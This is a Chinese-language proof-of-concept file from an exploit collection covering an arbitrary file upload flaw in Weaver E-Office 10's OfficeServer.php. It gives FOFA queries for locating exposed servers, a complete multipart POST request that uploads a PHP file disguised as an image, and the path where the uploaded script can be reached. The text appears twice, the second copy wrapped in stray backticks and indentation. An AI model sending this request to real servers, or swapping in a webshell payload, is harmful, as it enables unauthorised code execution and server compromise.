adysec_POC/wpoc/泛微OA/泛微E-Office10-OfficeServer任意文件上传漏洞.md

## 泛微E-Office10-OfficeServer任意文件上传漏洞

  泛微OA E-0ffice 10 OfficeServer.php 存在任意文件上传漏洞，攻击者通过漏洞可以获取到服务器敏感信息。

## fofa

```
app="泛微-EOffice"

body="eoffice_loading_tip" && body="eoffice10"
```


## poc

```
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept-Encoding: gzip, deflate
Connection: close
 
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
 
<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"
 
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
```

![image-20240524231729186](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242317261.png)


文件路径

```
http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php
```
wy876 POC backup 2025-03-07 18:18:50 +08:00			`## 泛微E-Office10-OfficeServer任意文件上传漏洞`

			`泛微OA E-0ffice 10 OfficeServer.php 存在任意文件上传漏洞，攻击者通过漏洞可以获取到服务器敏感信息。`

			`## fofa`

			```
			`app="泛微-EOffice"`

			`body="eoffice_loading_tip" && body="eoffice10"`
			```



			`## poc`

			```
			`POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1`
			`Host: xxx.xxx.xxx.xxx`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0`
			`Content-Length: 395`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`

			`------WebKitFormBoundaryJjb5ZAJOOXO7fwjs`
			`Content-Disposition: form-data; name="FileData"; filename="1.jpg"`
			`Content-Type: image/jpeg`

			`<?php phpinfo();unlink(__FILE__);?>`
			`------WebKitFormBoundaryJjb5ZAJOOXO7fwjs`
			`Content-Disposition: form-data; name="FormData"`

			`{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}`
			`------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--`
			```

			`![image-20240524231729186](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242317261.png)`



			`文件路径`

			```
			`http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php`
			```